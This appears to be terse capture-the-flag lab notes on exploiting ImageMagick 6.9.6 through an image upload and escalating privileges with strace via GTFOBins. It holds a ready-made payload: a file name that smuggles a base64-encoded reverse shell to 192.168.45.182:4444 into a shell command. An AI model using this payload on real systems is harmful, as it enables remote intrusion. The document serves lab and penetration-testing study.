Image (Intermediate) -- ImageMagick 6.9.6 exploit

[WDavid404]

Key points：

• ImageMagick 6.9.6 exploit info to reverse shell cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'
• strace （https://gtfobins.github.io/gtfobins/strace/）

[WDavid404]

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))

Recon

80/tcp: ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.214.178/FUZZ -mc 200 --> no info

Try upload a php file -->

Change php to php.jpg -->

ImageMagick 6.9.6 exploit info --> E.g. cp smile.gif '|smile"cat test.txt > leak.txt".gif' ----> cp image.jpg '|smile"echo | base64 -d | bash".jpg'

Exploit

https://www.revshells.com/ --> cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg' After upload the file, we got a reverse shell

PE

linpeas

https://gtfobins.github.io/gtfobins/strace/ -->